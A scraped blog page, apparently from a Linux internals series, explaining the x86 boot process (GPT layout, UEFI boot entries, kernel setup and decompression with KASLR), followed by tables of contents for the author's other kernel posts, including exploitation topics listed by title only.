https://wiki.archlinux.org/title/EFISTUB

0x04 The Kernel (Setup)

Okay, so we’re not QUITE in the kernel proper yet, we still need to run the kernel setup code (/arch/x86/boot/header.S for x86) in order to basically get a suitable environment up an running to be able to run arch/x86/boot/main.c in real mode, the first bit of C code! And THEN we can start to look into loading the rest of the kernel into memory. Anyway:

Getting to Main

In order to get to main, header.S does some housekeeping to make sure everything is how it should be. This includes making sure all the segment register values are aligned, setting up the stack, BSS area as well as some error handling in the form of a checking a setup signature to ensure everything’s looking good before jumping to main.

The First C

It’s all starting to kick off now! Except we’re still not technically in the kernel yet, as that’s still sat in a compressed image, waiting to be freed![1] For the sake of brevity, I’m going to quickly cover some of the key steps we take after running arch/x86/boot/main.c in order to ultimately decompress the kernel and run the actual kernel.

Initialisation, initialisation and then some more initialisation! During this stage the heap, console, keyboard, video mode and more are initialised. Furthermore CPU validation is carried out as well as memory detection in order to provide a map of available RAM to the CPU.

Another important part of the setup is the transition into protected mode and then 64-bit mode. Remember earlier we mentioned how we’ve been running in real-mode, one of several processor modes, which comes with a limit of 1MB addressable RAM?

The last task of arch/x86/boot/main.c is to shed those shackles and enable the transition into protected mode; the tl;dr is this is a more powerful mode with full access to the system’s memory, multitasking and support for virtual memory. After setting up the Interrupt & Global Descriptor Tables (IGT, GDT) among other things, we jump to the 32-bit protected mode entry point.

And Back To Assembly

Yep, that’s right, the 32-bit entry point is defined in arch/x86/boot/compressed/head_64.S and will cover some more setup, similar to what we saw for real-mode, as well as enabling the transition into long mode AKA 64-bit mode. So many modes, right?

Well, technically 64-bit mode is an enhancement of protected mode and is the native mode for x86_64 processors. It provides additional features and capabilities; allowing the CPU to take advantage of 64-bit processing.

During this stage some more setup occurs, the GDT is updated, page tables are initialised and after entering 64-bit mode, we jump to the 64-bit entry point in head_64.S.

Decompression Time!

First Some Background

Okay, there’s a lot to unpack here (haha), so I’ll try to keep things brief. At boot time, the kernel is typically sat on disk as a compressed image. You can check this out for yourself:

[sam4k ~]$ ls /boot
...  efi  grub  ...  vmlinuz-linux
[sam4k ~]$ file /boot/vmlinuz-linux 
/boot/vmlinuz-linux: Linux kernel x86 boot executable bzImage ...

With a little peek, we can see our kernel as it’s stored on disk! You’ll notice a couple of things here, one being that the kernel is compressed as a bzImage and that it’s an executable?!

The bzImage, big zImage, format was developed (unsurprisingly) to tackle size limitations for a growing Linux kernel. Although original compressed with gzip, newer kernels have wider support, including LZMA & bzip2[2].

bzImage files also follows a specific format, containing concatenated bootsect.o + setup.o + misc.o + piggy.o. Where piggy.o contains a gzipped vmlinux file in its data section[2]. Still following?

Now, the vmlinux file (notice we dropped the z) is a statically linked executable file that contains the Linux kernel in one of the object file formats supported by Linux, typically (and in thise case) the Executable and Linkable Format AKA ELF[3].

Out-of-scope for now, but the vmlinux is really neat, being an ELF means you can load it up into a debugger just like any other ELF, and make use of any symbols.

Back To Decompression

Okay, we’d just jumped to the 64-bit entry point in arch/x86/boot/compressed/head_64.S after transitioning to 64-bit mode. Now, like the last mode transition, there’s some more low level house keeping done and

After the transition to 64-bit mode there’s some more low level house keeping done, including figuring out where the decompressed kernels going to go, copying the compressed kernel their and then preparing the params for the extract_kernel function[4]!

As a security nerd, one of these parameters, the output of the decompressed kernel involves a call to choose_random_location[5] - this is integral to providing kernel address space layout randomization by randomizing where the kernel code is placed at boot time[6].

Some checks and a __decompress call later, the kernel is decompressed. The decompression is done in place (remember we made a copy of the compressed kernel earlier). However, we still need to move the now decompressed kernel to the right place, and that’s where parse_elf (remember the kernel image is an ELF executable!) and handle_relocations come in[7].

The tl;dr on these functions is to check the ELF header, load the various segments into memory (bearing in mind our KASLR), adjusting kernel addresses as necessary and finally moving everything to the right place in memory.

Next? After extract is complete, we jump to the kernel!

You can check this out for yourself by exploring your /boot/ folder
https://en.wikipedia.org/wiki/Vmlinux#bzImage
https://en.wikipedia.org/wiki/Vmlinux
arch/x86/boot/compressed/misc.c
arch/x86/boot/compressed/kaslr.c
https://en.wikipedia.org/wiki/Address_space_layout_randomization#Kernel_address_space_layout_randomization
You can find the src for these functions over in /arch/x86/boot/compressed/misc.c

0x05 The Kernel (Initialisation)

Yep, this fella is turning into a 3-part epic. Apologies! Tune in next time where we’ll cover the last two phases of the boot process I want to cover (hopefully in one post…):

0x05 The Kernel (Initialisation)
0x06 Systemd (Yikes)

exit(0);

Linternals: The (Modern) Boot Process [0x01]

sam4k — Sun, 26 Sep 2021 14:12:00 +0000

What more appropriate way to kick off a series on Linux internals than figuring out how we actually get those internals running in the first place? This post is going to cover the process that takes us from pressing a power button, to a fully usable Linux operating system.

As I mentioned in the introduction post for this series, I’m going to focus primarily on modern technologies and implementations where possible. So for this post I’ll be covering how UEFI reads our hard drive’s GPT to figure out how to find our Linux kernel. Once the kernels loaded in memory and ready to go, we look at how it uses systemd to get the operating system up and running in a usable state for us.

Confused? Don’t worry, hopefully by the end of the post you’ll be able to understand that last part, otherwise I need to rethink this whole series thing. Anyway, without further ado let’s jump over to where the magic begins.

Disclaimer: as I mentioned in my Linternals introduction, this series aims to strike a middle ground between curious Linux users and system programmers; so as a result of not diving super low, I may miss some nuances of particular hardware/implementations or otherwise generalise more complex topics.

0x00 GPT
- LBA?
- A Whistle-stop Tour
  - Protective MBR
  - Primary GPT Header
  - Partition Entries
  - Partitions
  - Secondary GPT
  - More GPT Resources
0x01 Push The Button!
0x02 UEFI
- The ESP
- CSM
Next Time

0x00 GPT

Okay, before we actually turn our computer on lets have a look at how all our data, like the operating system we want to run, is stored on a storage device (e.g. an SSD or HDD).

The GUID Partition Table (GPT) scheme is a standard for formatting storage devices using, who’d have thought it, globally unique identifiers (GUIDs). It was designed to improve upon its more limited predecessor, the Master Boot Record (MBR).


 LBA +----------------------+ <- Disk Sart
 000 | Protective MBR       |             
     +----------------------+ <-          
 001 | Primary GPT Header   |  |          
     +----------------------+  | Primary  
 002 | Entry 1 | 2 | 3 | 4  |  | GPT      
     +----------------------+  |          
 003 | Entries 5 |...| 128  |  |          
     +----------------------+ <-          
 034 | Partition 1          |             
     +----------------------+             
  X  | Partition ...        |             
     +----------------------+ <-          
 X+1 | Entry 1 | 2 | 3 | 4  |  |          
     +----------------------+  |          
 X+2 | Entries 5 | ... |128 |  | Secondary
     +----------------------+  | GPT      
X+34 | Secondary GPT Header |  |          
     +----------------------+ <- Disk End

LBA?

Before we have a brief look at what this diagram actually means, let me quickly explain what LBA actually means. In days of old physical blocks memory on hard disks were addressed using the cylinder-head-sector (CHS) scheme, nowadays the newer Logical Block Addressing (LBA) is more commonly used.

The tl;dr is that LBA is a simple linear addressing scheme which abstracts away from the physical details of the storage device; like the whole cylinder, head, sector stuff. This means the operating system (and our diagram above) simply needs to know that blocks of memory in our storage are located by an index; such that the logical block address of the first block is 0, the second is 1 and so on.

On the topic of “blocks of memory” and layout schemes, Linux uses 512 bytes for its logical block size. So LBA0 is a 512-byte block and the “Primary GPT” (we’ll worry about that means in a second) above spans 33 blocks so is 33*512=16896 bytes large.

A Whistle-stop Tour

Now that we know that LBA is just indexing blocks of memory in our disk, we can begin to briefly go over what the rest of that gibberish means. MBR? Entries?? Paritions?!

Protective MBR

“What’s the deal with this “Protective MBR”, I thought GPT replaced that?” I hear you ask, and that’s an astute observation! Well, as part of the GPT scheme the first LBA of the disk - LBA0 - is reserved for backwards compatibility with programs that are expecting an MBR.

However, this is not backwards compatibility in the traditional sense, and mainly a protection mechanism in order to prevent programs that don’t know about GPT from thinking the disk is unformatted and corrupt and potentially overwriting parts of our disk. As a result, the protective MBR basically defines the entire disk as one partition and sets the “System ID” of the partition as 0xEE which denotes a GPT disk.

As a result, older programs at the very least will see a single partition of an unknown type, without free space and generally shouldn’t touch it. And yes, that means the old MBR scheme fit into a single 512 byte logical block!

Primary GPT Header

Now that we’ve mitigated against any accidental formatting at the hands of MBR zealots, we have the “Primary GPT” and first up is LBA1, the Primary GPT Header. The header block contains various metadata about the disk and GPT scheme, including the range of usable logical blocks as well as number and size of partition entries.

Partition Entries

The partition entries span LBA2-LBA33 which each block containing 4 entries, making it 512/4=128 bytes per partition entry. Unsurprisingly, each entry represents a possible partition and if present contains the metadata necessary to define it: type GUID, unique GUID, start LBA, end LBA, name, attribute flags etc.

Partitions

These are the areas of storage defined by our partition entries previously and where our actual operating system and user data is going to be found. Not much else to say!

Secondary GPT

The Secondary GPT can be found out the end of the disk and is essentially just a duplicate of the Primary GPT for added redundancy in case the Primary gets corrupted.

More GPT Resources

http://ntfs.com/guid-part-table.htm

0x01 Push The Button!

So now we know how stuff is stored on our disk, let’s figure our what to do with the stuff on it and how that let’s me play Crusader Kings III. The first step? Pushing that power button of course!

I know I said I was going to avoid digging too deep into the nitty-gritty with this series, but I think it’s worth briefly touching on what’s going on under-the-hood here rather than thematic cut to UEFI; that said feel free to skip this section for the theatrical cut.

Okay let’s do this. So, we’ve just hit the power button, what now? Well I’m no engineer but as far as I understand, pressing that button causes a momentary short circuit in the motherboard which is enough for it send a signal over to the Power Supply Unit (PSU).

Upon receiving the signal, the PSU provides electricity to the computer. The motherboard should then receive the power good signal and starts the CPU. The CPU then does some initialisation and the important part is that it loads up a pre-configured start address, 0xfffffff0, which is where it expects to find the first instruction. This typically contains a jmp instruction (called the reset vector) which takes you to the BIOS/UEFI entry point.

Fancy a deeper dive?

https://0xax.gitbooks.io/linux-insides/content/Booting/linux-bootstrap-1.html

0x02 UEFI

Before we dive into the technicals, let’s clear up a couple of naming ambiguities:

Unified Extensible Firmware Interface (UEFI) is a specification for a software program that connects a computer’s firmware to its operating system (OS).[1]

UEFI is the successor of BIOS, although as many people still erroneously refer to UEFI as BIOS, the old BIOS is often referred to as Legacy BIOS; so things can get a bit confusing when people are referring to the BIOS - do they mean UEFI or legacy?!

Upon executing, UEFI will begin initialising and checking hardware; this includes things like peripherals allowing for mouse use in the boot menu, wild! Next it checks the special EFI variables stored in nonvolatile RAM (NVRAM). These store configurations that can be set by the OS or the user. You can access these with root perms via the command efibootmgr -v:

[sam@opulence ~]$ efibootmgr -v
BootCurrent: 0008
Timeout: 2 seconds
BootOrder: 0000,0001,0002,0003,0004,0005,0006
Boot0000* EndeavourOS
                        HD(1,
                           GPT,
                           xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx,
                           0x1000,
                           0x100000
                        )/File(\EFI\ENDEAVOUROS\GRUBX64.EFI)
...
Boot0004* UEFI:CD/DVD Drive     BBS(129,,0x0)
Boot0005* UEFI:Removable Device BBS(130,,0x0)
Boot0006* UEFI:Network Device   BBS(131,,0x0)

So we can see here that among other uses, the EFI variables determine the order in which the boot manager will attempt to load UEFI drivers and applications.

After loading up these variables, UEFI will begin to try and load each of the active entries listed, in the order defined by BootOrder. Boot0000 defines a typical UEFI native boot entry and tells UEFI:

Exactly where to look via the EFI_DEVICE_PATH_PROTOCOL. This is the HD(1,GPT,xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx,0x1000,0x100000) bit.
What file to load. This is the File(\EFI\ENDEAVOUROS\GRUBX64.EFI) bit and as the name suggests is the GRUB bootloader for my EndeavourOS install.

Armed with this information, UEFI will now go ahead and look for the EFI System Partition (ESP) on the specified storage device, mount it and launch that file. Given just a disk, UEFI is able to find the ESP via the GPT entries we mentioned earlier, where “ESP” is one of the possible attributes a partition can have.

One of the key improvements of UEFI is that it is capable of reading the FAT12, FAT16 and FAT32 file systems. So typically the ESP will be formatted as FAT32, allowing UEFI to read the partition and locate our ENDEAVOUROS\GRUBX64.EFI file and launch it.

The ESP

While we’re on the topic of the ESP, it’s worth mentioning the flexibility of this partition. Usually sized around 300-500MB, the ESP can contain the bootloaders for multiple OS’s and will have corresponding EFI vars in NVRAM. So you’re ESP could look something like this[2]:

/boot/efi/EFI
├── boot
│ ├── bootx64.efi [Default bootloader]
│ └── bootx64.OEM [Backup of same as delivered]
│
├── EndeavourOS
│ └── grubx64.efi
|
├── Ubuntu
│ └── grubx64.efi

CSM

One finally feature worth touching on is the Compatibility Support Module (CSM) in UEFI, which essentially provides Legacy BIOS compatibility via emulating a BIOS environment. This is an example where you’re GPTs “Protective MBR” would come in handy.

Refs & Extras

0x03 Optional Bootloader

It looks like I severely underestimated the length of this post, (we’re already 1700 words!), so to make this a bit more manageable I’m going to split this into two posts.

The next post, part 2, will cover the following section:

0x03 Optional Bootloader (surprise, surprise!)
0x04 The Kernel
0x05 Systemd (yikes)

exit(0);

sam4k

Kernel Exploitation Techniques: Turning The (Page) Tables

Contents

Paging Primer

Exploitation

User Page Table Allocation

Page Table Corruption?

Page-Level Primitives

What About Other Primitives?

Exploiting A Page UAF?

PT Entries

Huge Pages

Going For A Walk

Approaches

On Caching

Mitigations

Physical KASLR

Read-Only Memory

Resources

Wrapping Up

Linternals: Exploring The mm Subsystem via mmap [0x02]

Contents

Mapping Memory (cont.)

What Are Mappings?

struct vm_area_struct

mm->mm_mt

do_mmap()

Finding A Suitable addr

mmap_region()

VMA Merging

VMA Allocation

Final Bits

Summary

Next Time

Linternals: Exploring The mm Subsystem via mmap [0x01]

Contents

What is Memory Management?

Overview of The MM Subsystem

Representing Memory

Allocating Memory

Mapping Memory

Managing Memory

Getting Lost in The Source

Mapping Memory

Entering The Kernel

__x64_sys_mmap()

ksys_mmap_pgoff()

vm_mmap_pgoff()

Fetching Our mm_struct

A Bit Of Security

Locking

Next Time

ZDI-24-821: A Remote UAF in The Kernel's net/tipc

Contents

Overview

Timeline

Background Stuff

net/ Basics

struct sk_buff

struct skb_shared_info

TIPC Primer

The Vulnerability

Exploring The Call Trace

Examining tipc_buf_append()

Variations

Exploitation

Fix + Remediation

Remediation

Wrapup

Exploring Linux's New Random Kmalloc Caches

Contents

Current Heap Exploitation Meta

Approaching Heap Exploitation

Current Mitigations

Generic Techniques

Basic Heap Feng Shui

Cache Reuse/Overflow Attacks

Elastic Objects

FUSE

Introducing Random Kmalloc Caches

`struct vm_area_struct`

`mm->mm_mt`

`do_mmap()`

Finding A Suitable `addr`

`mmap_region()`

`__x64_sys_mmap()`

`ksys_mmap_pgoff()`

`vm_mmap_pgoff()`

Fetching Our `mm_struct`

`net/` Basics

`struct sk_buff`

`struct skb_shared_info`

Examining `tipc_buf_append()`